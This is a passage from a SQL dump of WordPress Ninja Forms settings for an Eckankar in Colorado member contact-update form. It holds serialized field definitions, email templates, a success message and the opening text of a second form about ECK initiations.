Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:49;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:13:\"West Virginia\";s:5:\"value\";s:2:\"WV\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:50;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:9:\"Wisconsin\";s:5:\"value\";s:2:\"WI\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:51;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:7:\"Wyoming\";s:5:\"value\";s:2:\"WY\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}s:3:\"key\";s:14:\"listselect_218\";s:11:\"field_label\";s:5:\"State\";s:9:\"field_key\";s:14:\"listselect_218\";s:15:\"container_class\";s:14:\"one-half first\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:36;}i:8;a:2:{s:8:\"settings\";a:35:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:9;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:11:\"listcountry\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:2:\"13\";s:5:\"label\";s:7:\"Country\";s:9:\"label_pos\";s:5:\"above\";s:13:\"default_value\";s:2:\"US\";s:21:\"user_info_field_group\";s:1:\"1\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:17:\"calc_auto_include\";s:1:\"0\";s:11:\"calc_option\";s:1:\"0\";s:24:\"country_use_custom_first\";s:1:\"1\";s:20:\"country_custom_first\";s:8:\"Colorado\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:26:\"user_info_field_group_name\";s:0:\"\";s:28:\"user_info_field_group_custom\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"0\";s:7:\"default\";s:2:\"US\";s:7:\"options\";a:0:{}s:3:\"key\";s:15:\"listcountry_219\";s:11:\"field_label\";s:7:\"Country\";s:9:\"field_key\";s:15:\"listcountry_219\";s:15:\"container_class\";s:8:\"one-half\";s:5:\"value\";s:2:\"US\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";i:37;}i:9;a:2:{s:8:\"settings\";a:18:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:10;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:2:\"hr\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:0:\"\";s:5:\"label\";s:2:\"hr\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:6:\"hr_207\";s:11:\"field_label\";s:2:\"hr\";s:9:\"field_key\";s:6:\"hr_207\";s:15:\"container_class\";s:0:\"\";}s:2:\"id\";i:38;}i:10;a:2:{s:8:\"settings\";a:35:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:11;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:8:\"textarea\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:0:\"\";s:5:\"label\";s:52:\"If You Have Comments To Add - Please Enter Them Here\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"label_pos\";s:5:\"above\";s:13:\"default_value\";s:0:\"\";s:12:\"textarea_rte\";s:1:\"0\";s:14:\"textarea_media\";s:1:\"0\";s:18:\"disable_rte_mobile\";s:1:\"0\";s:11:\"input_limit\";s:0:\"\";s:16:\"input_limit_type\";s:4:\"char\";s:17:\"calc_auto_include\";s:1:\"0\";s:8:\"num_sort\";s:1:\"0\";s:11:\"admin_label\";s:0:\"\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:8:\"required\";s:1:\"0\";s:7:\"default\";s:0:\"\";s:3:\"key\";s:12:\"textarea_210\";s:11:\"field_label\";s:52:\"If You Have Comments To Add - Please Enter Them Here\";s:9:\"field_key\";s:12:\"textarea_210\";s:11:\"placeholder\";s:0:\"\";s:15:\"container_class\";s:0:\"\";s:10:\"manual_key\";b:0;s:5:\"value\";s:0:\"\";}s:2:\"id\";i:39;}i:11;a:2:{s:8:\"settings\";a:12:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:12;s:11:\"idAttribute\";s:2:\"id\";s:5:\"label\";s:4:\"HTML\";s:4:\"type\";s:4:\"html\";s:7:\"default\";s:197:\"This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.\";s:15:\"container_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:18:\"html_1663797502959\";s:14:\"drawerDisabled\";b:0;}s:2:\"id\";s:3:\"611\";}i:12;a:2:{s:8:\"settings\";a:21:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:13;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:6:\"submit\";s:6:\"fav_id\";s:0:\"\";s:6:\"def_id\";s:0:\"\";s:5:\"label\";s:6:\"Submit\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:9:\"show_help\";s:1:\"0\";s:9:\"help_text\";s:0:\"\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:16:\"processing_label\";s:10:\"Processing\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:10:\"submit_212\";s:11:\"field_label\";s:6:\"Submit\";s:9:\"field_key\";s:10:\"submit_212\";s:15:\"container_class\";s:0:\"\";}s:2:\"id\";i:41;}}s:7:\"actions\";a:4:{i:0;a:2:{s:8:\"settings\";a:30:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:4:\"save\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:45:13\";s:5:\"label\";s:9:\"Save Form\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:15:\"submitter_email\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:12:\"email_format\";s:4:\"html\";s:12:\"from_address\";s:0:\"\";s:9:\"from_name\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:8:\"reply_to\";s:0:\"\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:11:\"success_msg\";s:42:\"Your form has been successfully submitted.\";}s:2:\"id\";i:13;}i:1;a:2:{s:8:\"settings\";a:28:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:45:13\";s:5:\"label\";s:17:\"Send copy to user\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:9:\"from_name\";s:20:\"Eckankar In Colorado\";s:12:\"from_address\";s:31:\"webmaster@eckankar-colorado.org\";s:2:\"to\";s:17:\"{field:email_204}\";s:13:\"email_subject\";s:27:\"Add/Update Email or Address\";s:13:\"email_message\";s:2787:\"<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td align=\"center\" valign=\"top\"><table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td align=\"left\" valign=\"top\"><table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%;font-size:35px;padding-top: 20px;\" align=\"left \" valign=\"\">Eckankar In Colorado  <p style=\"background-color: #ebebeb;color: #333333;font-size:25px;margin-top: 0px;\"><b> Member Contact Information Update</b></p></td><td></td></tr></tbody></table></td></tr><tr><td align=\"center\" valign=\"top\"><table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><tbody><tr><td align=\"left\" valign=\"top\"><p><strong>Hello {field:textbox_202},</strong></p><p>You have created a new form submission on the Eckankar In Colorado website. Your submission is requesting an update to either email or your mailing address.</p><p>For your records, here is a copy of the information that you have submitted:</p></td></tr></tbody></table><table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><tbody><tr><td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />                                \" valign=\"top\"><p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_202}<br> </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_203}<br> </span><span style=\"color: #333333\"><strong>EMAIL:</strong> {field:email_204}<br> </span><span style=\"color: #333333\"><strong>TELEPHONE:</strong> {field:phone_205}</span></p><p><span style=\"color: #333333\"><strong>STREET ADDRESS:</strong> {field:street_address_add_or_update_mailing_address_1616603898544}<br><strong>CITY:</strong> {field:city_216}<br><strong>STATE:</strong> {field:listselect_218}<br><strong>COUNTRY:</strong> {field:listcountry_219}<br> </span></p><p><span style=\"color: #333333\"><strong>COMMENTS: </strong>{field:textarea_210}</span></p></td></tr></tbody></table></td></tr><tr><td align=\"center\" valign=\"top\"><table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><tbody><tr><td align=\"left\" valign=\"top\">Thanks for updating your information with us!<br><br>If you have any questions regarding the origin of this form, please feel free to contact the<br> Eckankar In Colorado webmaster at:&nbsp;&nbsp;<em>webmaster@eckankar-colorado.org</em><p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br> <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table>\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:14;}i:2;a:2:{s:8:\"settings\";a:33:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:14:\"successmessage\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:45:13\";s:5:\"label\";s:15:\"Success Message\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data export tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:15:\"submitter_email\";s:0:\"\";s:18:\"fields-save-toggle\";s:8:\"save_all\";s:16:\"exception_fields\";a:0:{}s:18:\"set_subs_to_expire\";s:1:\"0\";s:16:\"subs_expire_time\";s:2:\"90\";s:12:\"date_updated\";s:10:\"2016-01-15\";s:9:\"from_name\";s:0:\"\";s:12:\"from_address\";s:0:\"\";s:2:\"to\";s:16:\"{wp:admin_email}\";s:13:\"email_subject\";s:22:\"Ninja Forms Submission\";s:13:\"email_message\";s:14:\"{fields_table}\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:1025:\"<div style=\"text-align: center\"><span style=\"font-size: 40px;\"><span style=\"color: #23507d\"><strong><br></strong></span></span></div><div style=\"text-align: center\"><span style=\"font-size: 40px;\"><span style=\"color: #23507d\"><strong><br></strong></span></span></div><div style=\"text-align: center\"><span style=\"font-size: 40px;\"><span style=\"color: #23507d\"><strong>Thank You!</strong></span></span></div><div style=\"text-align: center\"><span style=\"font-size: 30px;\"><span style=\"color: #23507d\"><strong><br></strong></span></span></div><div style=\"text-align: center; font-size:20px\">We appreciate you taking the time to update your contact information!</div><div style=\"text-align: center; font-size:20px\"><br></div><div style=\"text-align: center; font-size:20px;\">Your specific communication update(s) will be added to our database.&nbsp;</div><div style=\"text-align: center; font-size:20px;\"><br></div><div style=\"text-align: center; font-size:20px;\"><br></div><div style=\"text-align: center; font-size:20px;\"><br></div>\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:15;}i:3;a:2:{s:8:\"settings\";a:28:{s:10:\"objectType\";s:6:\"Action\";s:12:\"objectDomain\";s:7:\"actions\";s:10:\"editActive\";b:0;s:5:\"title\";s:0:\"\";s:3:\"key\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:6:\"active\";s:1:\"1\";s:10:\"created_at\";s:19:\"2018-01-03 11:45:13\";s:5:\"label\";s:11:\"Admin Email\";s:7:\"message\";s:160:\"This action adds users to WordPress\' personal data delete tool, allowing admins to comply with the GDPR and other privacy regulations from the site\'s front end.\";s:16:\"payment_gateways\";s:0:\"\";s:13:\"payment_total\";s:1:\"0\";s:3:\"tag\";s:0:\"\";s:19:\"email_message_plain\";s:0:\"\";s:12:\"date_updated\";s:10:\"2016-01-19\";s:9:\"from_name\";s:27:\"Add/Update Email or Address\";s:12:\"from_address\";s:31:\"webmaster@eckankar-colorado.org\";s:2:\"to\";s:32:\"co.eck.dba@eckankar-colorado.org\";s:13:\"email_subject\";s:43:\"ECK Colorado Website - Form Record Received\";s:13:\"email_message\";s:3086:\"<table id=\"bodyTable\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td align=\"center\" valign=\"top\"><table id=\"emailContainer\" border=\"0\" width=\"800\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td align=\"left\" valign=\"top\"><table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td style=\"background-color: #ebebeb;padding-left: 10px;color: #23507d;line-height: 80%;font-size:35px;padding-top: 20px;\" align=\"left \" valign=\"\">Eckankar In Colorado  <p style=\"background-color: #ebebeb;color: #333333;font-size:25px;margin-top: 10px;\"><b>Contact Information Update - Member</b></p></td><td>&nbsp;</td></tr></tbody></table></td></tr><tr><td align=\"center\" valign=\"top\"><table id=\"emailBody\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><tbody><tr><td align=\"left\" valign=\"top\"><p><strong>Hello!</strong><strong> You have a new<em> \"Add/Update Email or Address\"</em> form submission from an ECK Member.<br> </strong><br> This form was generated from a user submission on the <em>Eckankar In Colorado</em> website. You are receiving this submission because you are listed as the database administrator for Eckankar In Colorado.<br> <strong><br> The following person has added or updated their personal information.<br></strong>Here is the information that <strong><em><span style=\"color: #333333\">{field:textbox_202}</span> <span style=\"color: #333333\">{field:lastname_203}</span> </em></strong>has submitted:</p></td></tr></tbody></table><table id=\"emailHeader\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"20\"><tbody><tr><td style=\"background-color: #ebebeb;padding: 10px;border: 1px solid #cccccc\" align=\"left<br /><br />                                \" valign=\"top\"><p><span style=\"color: #333333\"><strong>FIRST NAME:</strong> {field:textbox_202}<br> </span><span style=\"color: #333333\"><strong>LAST NAME:</strong> {field:lastname_203}<br><strong>TELEPHONE:</strong> {field:phone_205}<br><strong>EMAIL:</strong> {field:email_204}<br> </span><br> <strong>STREET </strong><span style=\"color: #333333\"><strong>ADDRESS:</strong> {field:street_address_add_or_update_mailing_address_1616603898544}<br> </span><span style=\"color: #333333\"><strong>CITY:</strong> {field:city_216}<br><strong>STATE:</strong> {field:listselect_218}<br><strong>COUNTRY:</strong> {field:listcountry_219}<br></span></p><p><span style=\"color: #333333\"><strong>COMMENTS: </strong>{field:textarea_210}</span></p></td></tr></tbody></table></td></tr><tr><td align=\"center\" valign=\"top\"><table id=\"emailFooter\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"8\"><tbody><tr><td align=\"left\" valign=\"top\">If you have any questions regarding the origin of this form, please feel free to contact the Eckankar In Colorado webmaster at this email address:&nbsp;&nbsp;<em>webmaster@eckankar-colorado.org</em><br><br><p style=\"color: #23507d\"><em>Your Eckankar in Colorado Team<br> <a href=\"https://www.eckankar-colorado.org\">https://www.eckankar-colorado.org</a></em></p></td></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table>\";s:10:\"attach_csv\";s:1:\"0\";s:12:\"email_format\";s:4:\"html\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:12:\"redirect_url\";s:0:\"\";s:11:\"success_msg\";s:0:\"\";s:14:\"drawerDisabled\";s:0:\"\";}s:2:\"id\";i:16;}}s:8:\"settings\";a:41:{s:10:\"objectType\";s:12:\"Form Setting\";s:10:\"editActive\";b:1;s:5:\"title\";s:39:\"Add or Update Email or Address - Member\";s:10:\"created_at\";s:19:\"2019-07-15 14:04:26\";s:10:\"form_title\";s:27:\"Add/Update Email or Address\";s:10:\"show_title\";s:1:\"0\";s:14:\"clear_complete\";s:1:\"1\";s:13:\"hide_complete\";s:1:\"1\";s:9:\"logged_in\";s:1:\"0\";s:12:\"date_updated\";s:19:\"2016-02-19 00:14:49\";s:6:\"status\";s:0:\"\";s:11:\"append_page\";s:0:\"\";s:4:\"ajax\";s:1:\"0\";s:17:\"not_logged_in_msg\";s:0:\"\";s:16:\"sub_limit_number\";s:0:\"\";s:13:\"sub_limit_msg\";s:0:\"\";s:8:\"last_sub\";s:1:\"5\";s:10:\"conditions\";a:0:{}s:17:\"allow_public_link\";i:0;s:10:\"embed_form\";s:0:\"\";s:13:\"wrapper_class\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:3:\"key\";s:0:\"\";s:10:\"add_submit\";i:1;s:8:\"currency\";s:0:\"\";s:18:\"unique_field_error\";s:50:\"A form with this value has already been submitted.\";s:12:\"calculations\";a:0:{}s:15:\"formContentData\";a:13:{i:0;s:8:\"html_201\";i:1;s:11:\"textbox_202\";i:2;s:12:\"lastname_203\";i:3;s:9:\"phone_205\";i:4;s:9:\"email_204\";i:5;s:58:\"street_address_add_or_update_mailing_address_1616603898544\";i:6;s:8:\"city_216\";i:7;s:14:\"listselect_218\";i:8;s:15:\"listcountry_219\";i:9;s:6:\"hr_207\";i:10;s:12:\"textarea_210\";i:11;s:18:\"html_1663797502959\";i:12;s:10:\"submit_212\";}s:17:\"default_label_pos\";s:5:\"above\";s:20:\"repeatable_fieldsets\";s:0:\"\";s:19:\"changeEmailErrorMsg\";s:0:\"\";s:18:\"changeDateErrorMsg\";s:0:\"\";s:20:\"confirmFieldErrorMsg\";s:0:\"\";s:22:\"fieldNumberNumMinError\";s:0:\"\";s:22:\"fieldNumberNumMaxError\";s:0:\"\";s:22:\"fieldNumberIncrementBy\";s:0:\"\";s:23:\"formErrorsCorrectErrors\";s:0:\"\";s:21:\"validateRequiredField\";s:0:\"\";s:21:\"honeypotHoneypotError\";s:0:\"\";s:20:\"fieldsMarkedRequired\";s:0:\"\";s:14:\"drawerDisabled\";b:0;}s:14:\"deleted_fields\";a:0:{}s:15:\"deleted_actions\";a:0:{}}',4,0x00),(5,'a:7:{s:2:\"id\";i:5;s:20:\"show_publish_options\";b:0;s:6:\"fields\";a:11:{i:0;a:2:{s:8:\"settings\";a:20:{s:10:\"objectType\";s:5:\"Field\";s:12:\"objectDomain\";s:6:\"fields\";s:10:\"editActive\";b:0;s:5:\"order\";i:1;s:11:\"idAttribute\";s:2:\"id\";s:4:\"type\";s:4:\"html\";s:5:\"label\";s:4:\"Text\";s:15:\"input_limit_msg\";s:17:\"character(s) left\";s:13:\"default_value\";s:1248:\"<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Alamosa Initiators and ESAâs</span></span></span></strong></span></h3>\r\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.\r\n\r\n<strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal\r\nguidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained\r\nto offer this assistance.\r\n\r\nThere are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy.\r\n\r\nIf you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact below.\";s:7:\"desc_el\";s:3:\"div\";s:9:\"show_desc\";s:1:\"0\";s:8:\"desc_pos\";s:4:\"none\";s:9:\"desc_text\";s:0:\"\";s:13:\"element_class\";s:0:\"\";s:7:\"default\";s:1160:\"<p><p></p>\n<h3><span style=\"color: #23507d;\"><strong>Alamosa Initiators and ESA\'s</strong></span></h3>\n\n<strong>ECK Initiations</strong> link Soul directly to the ECK, Divine Spirit, for spiritual liberation in this lifetime. Each initiation is a sacred and joyous occasion for a spiritual seeker, for it brings an ever-increasing knowledge of and love for God. And it gives new insights into why certain things in your life play out as they do.</p>\n<p><strong>ECK Spiritual Aide</strong> sessions, though not counseling, can help you find your own answers in challenging situations through the personal\nguidance of Divine Spirit. The ESA session is conducted by an ECK Spiritual Aide, (ESA) who is an ECK cleric specially appointed and trained\nto offer this assistance.\n\nThere are no fees for the above services, but donations to Eckankar are accepted. Because of the sacred nature of these events, the initiators and ESA\'s will call you instead of sending an email. A personal call ensures your privacy.\n\nIf you have a pink slip for an ECK Initiation or would like to talk to an ECK Spiritual Aide, just select the person you would like to contact 